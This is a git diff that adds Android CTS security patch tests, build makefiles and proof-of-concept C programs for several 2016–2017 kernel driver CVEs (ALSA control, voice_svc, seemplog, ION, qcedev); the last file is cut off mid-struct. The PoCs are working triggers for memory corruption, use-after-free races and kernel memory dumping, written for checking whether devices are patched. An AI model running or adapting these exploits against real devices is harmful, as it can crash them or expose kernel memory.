+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10231/poc.c b/hostsidetests/security/securityPatch/CVE-2016-10231/poc.c
new file mode 100644
index 0000000..b6b82d7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10231/poc.c
@@ -0,0 +1,86 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <string.h>
+#include <stdlib.h>
+
+#define SNDRV_CTL_IOCTL_ELEM_WRITE _IOWR('U', 0x13, struct snd_ctl_elem_value)
+
+typedef int __bitwise snd_ctl_elem_iface_t;
+
+struct snd_aes_iec958 {
+ unsigned char status[24];
+ unsigned char subcode[147];
+ unsigned char pad;
+ unsigned char dig_subframe[4];
+};
+
+struct snd_ctl_elem_id {
+ unsigned int numid;
+ snd_ctl_elem_iface_t iface;
+ unsigned int device;
+ unsigned int subdevice;
+ unsigned char name[44];
+ unsigned int index;
+};
+
+struct snd_ctl_elem_value {
+ struct snd_ctl_elem_id id;
+ unsigned int indirect: 1;
+ union {
+ union {
+ long value[128];
+ long *value_ptr;
+ } integer;
+ union {
+ long long value[64];
+ long long *value_ptr;
+ } integer64;
+ union {
+ unsigned int item[128];
+ unsigned int *item_ptr;
+ } enumerated;
+ union {
+ unsigned char data[512];
+ unsigned char *data_ptr;
+ } bytes;
+ struct snd_aes_iec958 iec958;
+ } value;
+ struct timespec tstamp;
+ unsigned char reserved[128-sizeof(struct timespec)];
+};
+
+int main()
+{
+ struct snd_ctl_elem_value val;
+ memset(&val, 0xff, sizeof(val));
+ val.id.numid = 0x80;
+ val.id.iface = 0x1;
+ val.id.device = 0x400;
+ val.id.subdevice = 0x7;
+ memcpy(val.id.name, "\x1d\xfe\xcb\x4c\x1f\x74\x53\xcb\x34\x3c\xcc\x05\xa4\x8e\x24\x98\x87\xe5\xc5\x58\xaf\xb1\x82\x96\x43\x67\x54\xd8\x6d\x5e\x3b\x05\x95\xbe\xfb\xe7\x2e\x7d\x08\xf8\xd6\x7e\xaa\x54", 44);
+ val.id.index = 4;
+ val.value.integer.value[0] = 0x30;
+ int fd = open("/dev/snd/controlC0", O_RDWR);
+ ioctl(fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &val);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0451/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0451/Android.mk
new file mode 100644
index 0000000..6e52fa7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0451/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0451
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact \
+
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
+
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0451/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0451/poc.c
new file mode 100644
index 0000000..88b7378
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0451/poc.c
@@ -0,0 +1,71 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+#include <errno.h>
+
+#define MSG_REQUEST 0x2
+
+struct voice_svc_write_msg {
+ __u32 msg_type;
+ __u8 payload[0];
+};
+
+int main() {
+ int g_fd = 0;
+ char* dev_path = "/dev/voice_svc";
+
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ return -1;
+ }
+
+ int size = sizeof(struct voice_svc_write_msg) + 4;
+ char* msg = (char*)malloc(size);
+
+ (msg + 4)[0] = 'A';
+ (msg + 4)[1] = 'A';
+ (msg + 4)[2] = 'A';
+ (msg + 4)[3] = 'A';
+ ((struct voice_svc_write_msg*)msg)->msg_type = MSG_REQUEST;
+
+ int i;
+ for (i = 0; i < 20; ++i) {
+ write(g_fd, msg, size);
+ sleep(1);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0462/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0462/Android.mk
new file mode 100644
index 0000000..46c773d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0462/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0462
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0462/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0462/poc.c
new file mode 100644
index 0000000..5cf6a49
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0462/poc.c
@@ -0,0 +1,214 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define DEVICE "/dev/seemplog"
+#define SZ_1M 0x100000
+#define FOUR_MB (4 * SZ_1M)
+
+#define BLK_SIZE 256
+#define BLK_HDR_SIZE 64
+#define TS_SIZE 20
+#define BLK_MAX_MSG_SZ (BLK_SIZE - BLK_HDR_SIZE)
+
+#define TASK_COMM_LEN 16
+
+#define MAGIC 'z'
+
+#define SEEMP_CMD_RESERVE_RDBLKS _IOR(MAGIC, 1, int)
+#define SEEMP_CMD_RELEASE_RDBLKS _IO(MAGIC, 2)
+#define SEEMP_CMD_GET_RINGSZ _IOR(MAGIC, 3, int)
+#define SEEMP_CMD_GET_BLKSZ _IOR(MAGIC, 4, int)
+#define SEEMP_CMD_SET_MASK _IO(MAGIC, 5)
+#define SEEMP_CMD_SET_MAPPING _IO(MAGIC, 6)
+#define SEEMP_CMD_CHECK_FILTER _IOR(MAGIC, 7, int)
+#define SEEMP_CMD_DEBUG_START _IOR(MAGIC, 8, int)
+#define SEEMP_CMD_DEBUG_STOP _IOR(MAGIC, 9, int)
+
+struct read_range {
+ int start_idx;
+ int num;
+};
+
+struct blk_payload {
+ uint32_t api_id;
+ char msg[BLK_MAX_MSG_SZ];
+} __attribute__((packed));
+
+struct seemp_logk_blk {
+ uint8_t status;
+ uint16_t len;
+ uint8_t version;
+ int32_t pid;
+ int32_t uid;
+ int32_t tid;
+ int32_t sec;
+ int32_t nsec;
+ char ts[TS_SIZE];
+ char appname[TASK_COMM_LEN];
+ struct blk_payload payload;
+} __attribute__((packed));
+
+void dump_blk_headers(char *ptr) {
+ int i;
+ struct seemp_logk_blk *temp;
+
+ for (i = 0; i < (FOUR_MB / 256); i++) {
+ temp = (struct seemp_logk_blk *)ptr;
+
+ ptr += 256;
+ }
+}
+
+void print_maps(int time) {
+ char cmd[] = "/proc/%d/maps";
+ char cmd2[sizeof("/proc/-2147483648/maps")];
+ FILE *fp;
+ size_t nread;
+ char buf[1024];
+
+ snprintf(cmd2, sizeof(cmd2)-1, cmd, getpid());
+
+ fp = fopen(cmd2, "r");
+ if (fp == NULL) {
+ exit(-1);
+ }
+
+ while ((nread = fread(buf, 1, sizeof(buf), fp)) > 0)
+ fwrite(buf, 1, nread, stdout);
+
+ fclose(fp);
+ sleep(time);
+}
+
+void reserve_rdblks(int fd) {
+ struct read_range rrange;
+ ioctl(fd, SEEMP_CMD_RESERVE_RDBLKS, &rrange);
+}
+
+unsigned int get_ringsz(int fd) {
+ unsigned int ringsz;
+ ioctl(fd, SEEMP_CMD_GET_RINGSZ, &ringsz);
+ return ringsz;
+}
+
+unsigned int get_blksz(int fd) {
+ unsigned int blksz;
+ ioctl(fd, SEEMP_CMD_GET_BLKSZ, &blksz);
+ return blksz;
+}
+
+void write_to_file(char *ptr) {
+ FILE *dumpfp = fopen("/data/local/tmp/dump", "wb");
+ int i;
+
+ if (dumpfp == NULL) {
+ exit(-1);
+ }
+
+ fwrite(ptr, 1, FOUR_MB, dumpfp);
+ fclose(dumpfp);
+}
+
+void write_to_dev(int fd) {
+ char ts[] = "IIIIIIIIIIIIIIIIIIII";
+ char appname[] = "JJJJJJJJJJJJJJJJ";
+ char msg[] = "LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL";
+
+ struct seemp_logk_blk block;
+
+ block.status = 0xff;
+ block.len = 0x4242;
+ block.version = 'C';
+ block.pid = 0x44444444;
+ block.uid = 0x45454545;
+ block.tid = 0x46464646;
+ block.sec = 0x47474747;
+ block.nsec = 0x48484848;
+ strcpy(block.ts, ts);
+ strcpy(block.appname, appname);
+ block.payload.api_id = 0x51515151;
+ strcpy(block.payload.msg, msg);
+}
+
+void do_mapping(void **ptr, int fd) {
+ *ptr = mmap(NULL,
+ FOUR_MB,
+ 0x7,
+ MAP_SHARED,
+ fd,
+ 0);
+ if (*ptr == MAP_FAILED) {
+ close(fd);
+ exit(-1);
+ }
+}
+
+void spam_mapped_region(char *ptr, int offset, int size) {
+ int i;
+ for (i = offset; i < size; i++)
+ *(ptr + i) = 'A';
+}
+
+void start_printk(int fd) {
+ ioctl(fd, SEEMP_CMD_DEBUG_START, NULL);
+}
+
+void stop_printk(int fd) {
+ ioctl(fd, SEEMP_CMD_DEBUG_STOP, NULL);
+}
+
+int main() {
+ int fd;
+ void *ptr;
+ int i;
+
+ fd = open(DEVICE, O_RDWR);
+ if (fd == -1) {
+ exit(-1);
+ }
+
+ start_printk(fd);
+
+ do_mapping(&ptr, fd);
+
+ for (i = 0; i < (FOUR_MB / 256); i++)
+ write_to_dev(fd);
+
+ dump_blk_headers(ptr);
+ print_maps(5);
+
+ write_to_file(ptr);
+
+ stop_printk(fd);
+
+ close(fd);
+ munmap(ptr, FOUR_MB);
+
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0564/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0564/Android.mk
new file mode 100644
index 0000000..91d154c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0564/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2017-0564
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0564/local_poc.h b/hostsidetests/security/securityPatch/CVE-2017-0564/local_poc.h
new file mode 100644
index 0000000..6867562
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0564/local_poc.h
@@ -0,0 +1,80 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+/*
+ * Let any architecture override either of the following before
+ * including this file.
+ */
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+/*
+ * Direction bits, which any architecture can choose to override
+ * before including this file.
+ */
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
+
+
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+
+
+/* used to create numbers */
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+#endif
+
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0564/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0564/poc.c
new file mode 100644
index 0000000..7734d4c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0564/poc.c
@@ -0,0 +1,221 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <stdio.h>
+#include <stdio.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <string.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <linux/ion.h>
+
+#define ION_HEAP(bit) (1 << (bit))
+
+enum ion_heap_ids {
+ INVALID_HEAP_ID = -1,
+ ION_CP_MM_HEAP_ID = 8,
+ ION_SECURE_HEAP_ID = 9,
+ ION_SECURE_DISPLAY_HEAP_ID = 10,
+ ION_CP_MFC_HEAP_ID = 12,
+ ION_CP_WB_HEAP_ID = 16, /* 8660 only */
+ ION_CAMERA_HEAP_ID = 20, /* 8660 only */
+ ION_SYSTEM_CONTIG_HEAP_ID = 21,
+ ION_ADSP_HEAP_ID = 22,
+ ION_PIL1_HEAP_ID = 23, /* Currently used for other PIL images */
+ ION_SF_HEAP_ID = 24,
+ ION_SYSTEM_HEAP_ID = 25,
+ ION_PIL2_HEAP_ID = 26, /* Currently used for modem firmware images */
+ ION_QSECOM_HEAP_ID = 27,
+ ION_AUDIO_HEAP_ID = 28,
+ ION_MM_FIRMWARE_HEAP_ID = 29,
+ ION_HEAP_ID_RESERVED = 31 /** Bit reserved for ION_FLAG_SECURE flag */
+};
+
+static unsigned int ion_type[] = {
+ ION_HEAP(ION_CP_MM_HEAP_ID),
+ ION_HEAP(ION_CP_MFC_HEAP_ID),
+ ION_HEAP(ION_SYSTEM_CONTIG_HEAP_ID),
+ ION_HEAP(ION_ADSP_HEAP_ID ),
+ ION_HEAP(ION_SF_HEAP_ID),
+ ION_HEAP(ION_SYSTEM_HEAP_ID),
+ ION_HEAP(ION_QSECOM_HEAP_ID),
+ ION_HEAP(ION_AUDIO_HEAP_ID),
+};
+
+#define NEW_ION
+int ion_alloc(int fd, int len, int *hdl, unsigned int ion_type)
+{
+ int ret;
+ struct ion_allocation_data req = {
+ .len = len,
+#ifdef NEW_ION
+ .heap_id_mask = ion_type,
+ //.flags = ION_SECURE | ION_FORCE_CONTIGUOUS,
+ .flags = (1 << 0),
+ .flags = 0x0,
+#else
+ .flags = ION_SECURE | ION_FORCE_CONTIGUOUS | ION_HEAP(ION_CP_MM_HEAP_ID),
+#endif
+ .align = len,
+ };
+
+ ret = ioctl(fd, ION_IOC_ALLOC, &req);
+ if (ret) {
+ return ret;
+ }
+
+ *hdl = req.handle;
+
+ return 0;
+}
+
+int ion_free(int fd, int hdl)
+{
+ int ret;
+ struct ion_handle_data req = {
+ .handle = hdl,
+ };
+
+ ret = ioctl(fd, ION_IOC_FREE, &req);
+ if (ret) {
+ return ret;
+ }
+
+ return 0;
+}
+
+int ion_map(int fd, int hdl)
+{
+ int ret;
+ struct ion_fd_data req = {
+ .handle = hdl,
+ };
+
+ ret = ioctl(fd, ION_IOC_MAP, &req);
+ if (ret) {
+ return ret;
+ }
+
+ return req.fd;
+}
+
+int ion_fd;
+int ion_handle;
+int status[2];
+int cmd = 0;
+
+void *threadForIonFree01()
+{
+ status[0] = 1;
+
+ while (cmd == 0) {
+ usleep(10);
+ }
+ if (cmd == -1)
+ goto failed;
+
+ usleep(50);
+ ion_free(ion_fd, ion_handle);
+
+failed:
+ status[0] = 2;
+ return NULL;
+}
+
+
+void *threadForIonFree02()
+{
+ status[1] = 1;
+
+ while (cmd == 0) {
+ usleep(10);
+ }
+ if(cmd == -1)
+ goto failed;
+
+ usleep(50);
+ ion_free(ion_fd, ion_handle);
+
+failed:
+ status[1] = 2;
+ return NULL;
+}
+
+int main()
+{
+ int ret, i, count;
+ pthread_t tid_free[2];
+
+ count = 0;
+retry:
+ status[0] = 0;
+ status[1] = 0;
+ cmd = 0;
+ ion_fd = open("/dev/ion", O_RDONLY| O_SYNC, 0);
+ if (ion_fd < 0) {
+ return -1;
+ }
+
+ for (i=0; i < sizeof(ion_type)/sizeof(ion_type[0]); i++) {
+ ret = ion_alloc(ion_fd, 0x1000, &ion_handle, ion_type[i]);
+ if (ret == 0) {
+ break;
+ }
+ }
+
+ if (i == sizeof(ion_type)/sizeof(ion_type[0])) {
+ goto failed;
+ }
+
+ ret = pthread_create(&tid_free[0], NULL, threadForIonFree01, NULL);
+ if (ret != 0) {
+ goto failed;
+ }
+
+ ret = pthread_create(&tid_free[1], NULL, threadForIonFree02, NULL);
+ if (ret != 0) {
+ cmd = -1;
+ goto failed;
+ }
+
+ while (status[0] != 1 || status[1] != 1) {
+ usleep(50);
+ }
+
+ cmd = 1;
+ ret = ion_map(ion_fd, ion_handle);
+
+ while (status[0] != 2 || status[1] != 2) {
+ usleep(50);
+ }
+
+failed:
+ ion_free(ion_fd,ion_handle);
+ close(ion_fd);
+ goto retry;
+
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0576/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0576/Android.mk
new file mode 100644
index 0000000..c62755c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0576/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0576
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0576/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0576/poc.c
new file mode 100644
index 0000000..f08a068
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0576/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <string.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <inttypes.h>
+#include <errno.h>
+
+#define QCEDEV_MAX_KEY_SIZE 64
+#define QCEDEV_MAX_IV_SIZE 32
+#define QCEDEV_MAX_BUFFERS 16
+
+struct buf_info {
+ union {
+ uint32_t offset;
+ uint8_t *vaddr;
+ };
+ uint32_t len;
+};
+
+struct qcedev_vbuf_info {
+ struct buf_info src[QCEDEV_MAX_BUFFERS];
+ struct buf_info dst[QCEDEV_MAX_BUFFERS];
+};
+
+struct qcedev_pmem_info {
+ int fd_src;
+ struct buf_info src[QCEDEV_MAX_BUFFERS];
+ int fd_dst;
+ struct buf_info dst[QCEDEV_MAX_BUFFERS];
+};
+
+enum qcedev_oper_enum {
+ QCEDEV_OPER_DEC = 0,
+ QCEDEV_OPER_ENC = 1,
+ QCEDEV_OPER_DEC_NO_KEY = 2,
+ QCEDEV_OPER_ENC_NO_KEY = 3,
+ QCEDEV_OPER_LAST
+};
+
+enum qcedev_cipher_alg_enum {
+ QCEDEV_ALG_DES = 0,
+ QCEDEV_ALG_3DES = 1,
+ QCEDEV_ALG_AES = 2,
+ QCEDEV_ALG_LAST
+};
+
+enum qcedev_cipher_mode_enum {
+ QCEDEV_AES_MODE_CBC = 0,
+ QCEDEV_AES_MODE_ECB = 1,
+ QCEDEV_AES_MODE_CTR = 2,
+ QCEDEV_AES_MODE_XTS = 3,
+ QCEDEV_AES_MODE_CCM = 4,
+ QCEDEV_DES_MODE_CBC = 5,
+ QCEDEV_DES_MODE_ECB = 6,
+ QCEDEV_AES_DES_MODE_LAST
+};
+
+struct qcedev_cipher_op_req {
+ uint8_t use_pmem;
+ union {
+ struct qcedev_pmem_info pmem;
+ struct qcedev_vbuf_info vbuf;
+ };
+ uint32_t entries;
